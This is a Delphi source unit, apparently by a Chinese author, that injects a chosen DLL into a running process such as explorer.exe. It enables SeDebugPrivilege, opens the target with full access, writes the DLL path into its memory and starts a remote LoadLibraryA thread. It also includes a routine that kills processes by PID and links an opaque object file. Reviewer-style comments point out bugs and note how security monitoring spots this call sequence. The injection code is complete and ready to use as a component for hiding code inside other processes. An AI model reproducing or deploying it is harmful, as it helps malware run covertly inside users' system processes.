{
DLLInject Unit One For 9x,nt,2k,xp,2k3 By Anskya
Email:Anskya@Gmail.com
Web:http://Www.Anskya.Net
DLL进程插入单元 For Delphi
可以在9x,Nt,2K,Xp,2K3下工作
采用远程线程注入LoadLibraryA('xxx.dll');代码
来进行DLL插入
example:
DNADLL('explorer.exe','c:\test.dll');
}
unit DLLInject;
interface
uses windows;
function DNADLL(Name: string;DLLPath: PChar):Boolean; // injects DLLPath into the first process whose image name equals Name (ASCII case-insensitive); True only if the remote loader thread was created
procedure killbyPID(PID: DWORD); // terminates the process with this PID (OpenProcess + TerminateProcess)
{ The x-prefixed functions below are not imported from kernel32 by name: they
  are resolved at link time from EliRT_OMF_B.obj, pulled in by the $L
  directive in the implementation section. That object file is an opaque
  binary not shown in this unit; presumably each routine wraps the like-named
  Win32 API (VirtualAllocEx / VirtualFreeEx / CreateRemoteThread), but that
  cannot be verified here. Whatever the object file contains runs with the
  host process's privileges, so its provenance should be checked before this
  unit is built. }
function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; dwFreeType: LongWord): Boolean; stdcall; external;
function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;
implementation
// Links the opaque object file that supplies xVirtualAllocEx, xVirtualFreeEx
// and xCreateRemoteThread (declared in the interface section). Its contents
// are not visible in this unit; verify the file against a trusted build.
{$L EliRT_OMF_B.obj}
// Retained, commented-out duplicates of the interface declarations above.
//function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
//function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; dwFreeType: LongWord): Boolean; stdcall; external;
//function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;
// Toolhelp snapshot flag (TH32CS_SNAPPROCESS). Declared locally, together with
// the record below, because this unit uses only Windows and not TlHelp32.
const
TH32CS_SnapProcess = 2;
type
// Local copy of the Toolhelp PROCESSENTRY32 layout. dwSize must be set to
// SizeOf(record) before Process32First (DNADLL does this); szExeFile is the
// NUL-terminated image file name that DNADLL compares against its Name
// argument. th32ProcessID is the PID handed to OpenProcess.
TProcessEntry32 = record
dwSize: DWORD;
cntUsage: DWORD;
th32ProcessID: DWORD;
th32DefaultHeapID: DWORD;
th32ModuleID: DWORD;
cntThreads: DWORD;
th32ParentProcessID: DWORD;
pcPriClassBase: integer;
dwFlags: DWORD;
szExeFile: array [0..MAX_PATH-1] of char;
end;
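procedure killbyPID(PID: DWORD);
{ Terminates the process identified by PID with exit code 0.
  Best-effort: nothing is reported back to the caller. If OpenProcess fails
  (no such PID, or access denied) the procedure returns without doing
  anything. The process handle is closed afterwards; the original left it
  open, leaking one handle per call. }
var
  hProc: THandle;
begin
  hProc := OpenProcess(PROCESS_TERMINATE, False, PID);
  if hProc = 0 then
    Exit; // OpenProcess failed; TerminateProcess on a null handle would be pointless
  TerminateProcess(hProc, 0); // result deliberately ignored: procedure has no return value
  CloseHandle(hProc);
end;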
// Privilege name passed to LookupPrivilegeValue in GetDebugPrivs.
Const SE_DEBUG_NAME = 'SeDebugPrivilege' ;
procedure GetDebugPrivs; // enables SeDebugPrivilege on the current process token (best-effort)
{ Opens the current process token and asks for SeDebugPrivilege to be
  enabled. Best-effort: the results of LookupPrivilegeValue and
  AdjustTokenPrivileges are ignored, so if the account does not hold the
  privilege the call fails silently and the caller (DNADLL) proceeds anyway.
  hToken is never closed, so each call leaks one handle.
  NOTE(review): a token privilege adjustment is an auditable event, and
  enabling this particular privilege is a typical precursor that monitoring
  looks for ahead of cross-process access. }
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dword;
begin
If (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)) then
begin
// Fills tkp.Privileges[0].Luid; return value not checked, so on failure
// AdjustTokenPrivileges below is called with an uninitialised LUID.
LookupPrivilegeValue(nil, SE_DEBUG_NAME , tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
// No previous-state buffer (0, nil): the prior privilege state is discarded,
// so nothing in this unit can restore it later.
AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end;
function LowerCase(const S: string): string;
{ ASCII-only lower-casing: 'A'..'Z' become 'a'..'z', every other character is
  copied unchanged (non-ASCII letters are left as they are). Stands in for
  SysUtils.LowerCase, which this unit does not import. An empty string yields
  an empty string. }
var
  Idx: Integer;
  C: Char;
begin
  SetLength(Result, Length(S));
  for Idx := 1 to Length(S) do
  begin
    C := S[Idx];
    if C in ['A'..'Z'] then
      Inc(C, 32); // distance between 'A' and 'a' in ASCII
    Result[Idx] := C;
  end;
end;
function InjectLibrary(Process: LongWord; DLLPath: PChar): Boolean;
{ Loads the DLL named by DLLPath into the target process: allocates one
  4096-byte page in the target, copies the path there and starts a remote
  thread at this process's kernel32!LoadLibraryA with that page as argument.
  Returns True when a remote thread was created; it does not verify that
  LoadLibraryA itself succeeded (the thread exit code is never read).
  Process must carry the rights needed by the three remote-memory/thread
  calls (DNADLL opens it with PROCESS_ALL_ACCESS).
  Defensive note: the allocate / write / CreateRemoteThread-at-LoadLibraryA
  sequence below is the classic remote-thread DLL-load pattern, and it is
  precisely the cross-process activity (remote allocation and write, then a
  thread created in another process at a loader export) that kernel
  callbacks and EDR telemetry typically surface. }
var
Parameters: Pointer;
BytesWritten, Thread, ThreadID: dword;
begin
Result := False;
Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
if Parameters = nil then Exit;
// Copies a fixed 4096 bytes from DLLPath rather than StrLen+1: this reads
// past the end of the caller's string, which can fault or copy unrelated
// adjacent memory into the target. Both BytesWritten and the call's return
// value are ignored.
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
// Thread entry is LoadLibraryA as resolved in *this* process; the code
// assumes kernel32 is mapped at the same address in the target (holds for
// same-bitness processes within one boot session, but is never checked).
Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
// Waits at most 3 s for the loader thread; on timeout execution continues.
WaitForSingleObject(Thread, 3000);
// The parameter page is released before checking whether the thread was
// even created, and regardless of whether it finished: after a timeout
// LoadLibraryA may still be reading the freed page.
xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
if Thread = 0 then Exit; // CreateRemoteThread failed; Result stays False
CloseHandle(Thread);
Result := True;
end;
// Toolhelp32 entry points, resolved at run time from kernel32 by
// TestToolhelpFunctions rather than linked statically (so the unit still
// loads on systems where kernel32 lacks them). nil until resolved; the
// wrapper functions below bind them lazily on first use.
var
pCreateToolhelp32Snapshot : function (dwFlags, th32ProcessID: cardinal) : cardinal; stdcall = nil;
pProcess32First : function (hSnapshot: cardinal; var lppe: TProcessEntry32) : bool; stdcall = nil;
pProcess32Next : function (hSnapshot: cardinal; var lppe: TProcessEntry32) : bool; stdcall = nil;
function TestToolhelpFunctions : boolean;
{ Resolves the three Toolhelp32 entry points from the already-loaded
  kernel32 module into the unit-level procedure variables. Returns True only
  when all three were found; any that are missing stay nil and the lazy
  wrappers below report failure instead of calling through nil. }
var
  Kernel32: cardinal;
begin
  Kernel32 := GetModuleHandle('kernel32');
  @pCreateToolhelp32Snapshot := GetProcAddress(Kernel32, 'CreateToolhelp32Snapshot');
  @pProcess32First := GetProcAddress(Kernel32, 'Process32First');
  @pProcess32Next := GetProcAddress(Kernel32, 'Process32Next');
  Result := Assigned(pCreateToolhelp32Snapshot)
    and Assigned(pProcess32First)
    and Assigned(pProcess32Next);
end;
function CreateToolhelp32Snapshot (dwFlags,th32ProcessID: cardinal) : cardinal;
{ Lazy-binding wrapper around kernel32!CreateToolhelp32Snapshot. Resolves the
  Toolhelp32 entry points on first use; returns 0 when they are unavailable
  (note the real API signals failure with INVALID_HANDLE_VALUE, not 0, so a
  caller has two distinct failure values to consider). }
begin
  if (not Assigned(pCreateToolhelp32Snapshot)) and (not TestToolhelpFunctions) then
  begin
    Result := 0;
    Exit;
  end;
  Result := pCreateToolhelp32Snapshot(dwFlags, th32ProcessID);
end;
function Process32First(hSnapshot: cardinal; var lppe: TProcessEntry32) : bool;
{ Lazy-binding wrapper around kernel32!Process32First. Binds the Toolhelp32
  entry points on first use and returns False when they cannot be resolved;
  otherwise forwards to the real function (lppe.dwSize must already be set). }
begin
  if (not Assigned(pProcess32First)) and (not TestToolhelpFunctions) then
  begin
    Result := False;
    Exit;
  end;
  Result := pProcess32First(hSnapshot, lppe);
end;
function Process32Next(hSnapshot: cardinal; var lppe: TProcessEntry32) : bool;
{ Lazy-binding wrapper around kernel32!Process32Next. Binds the Toolhelp32
  entry points on first use and returns False when they cannot be resolved;
  otherwise forwards to the real function. }
begin
  if (not Assigned(pProcess32Next)) and (not TestToolhelpFunctions) then
  begin
    Result := False;
    Exit;
  end;
  Result := pProcess32Next(hSnapshot, lppe);
end;
function DNADLL(Name: string;DLLPath: PChar):Boolean;
{ Finds the first running process whose executable file name equals Name
  (both sides ASCII-lower-cased with the local LowerCase) and injects DLLPath
  into it via InjectLibrary. Returns True only if InjectLibrary reported
  success; False when no process matched or injection failed.
  Observations on the code as written (not changed here):
  - the snapshot handle is not checked against INVALID_HANDLE_VALUE before
    use; a False from Process32First simply skips the loop;
  - the OpenProcess result is neither checked for 0 nor ever closed, so a
    successful call leaks a PROCESS_ALL_ACCESS handle to the target;
  - only the first matching image name is touched (Break); further
    processes with the same name are ignored.
  Defensive note: the chain here -- SeDebugPrivilege enable, process
  enumeration, OpenProcess(PROCESS_ALL_ACCESS) on another process, then a
  remote thread from InjectLibrary -- is exactly the behaviour sequence that
  process-access auditing and EDR telemetry are built to surface. }
var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle:dword;
ContinueLoop: BOOL;
begin
Result := False;
GetDebugPrivs; // best-effort; its outcome is not reported back
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
// dwSize must be filled in before the first Process32First call.
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle,FProcessEntry32);
Name:=LowerCase(Name);
While ContinueLoop do
begin
// szExeFile is a char array treated as a NUL-terminated string; the match
// is on the bare image file name, not a full path, so any process with that
// name qualifies.
If Name = LowerCase(FProcessEntry32.szExeFile) then
begin
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
if InjectLibrary(ProcessHandle, DLLPath) then Result := True;
Break;
end;
ContinueLoop:=Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
end.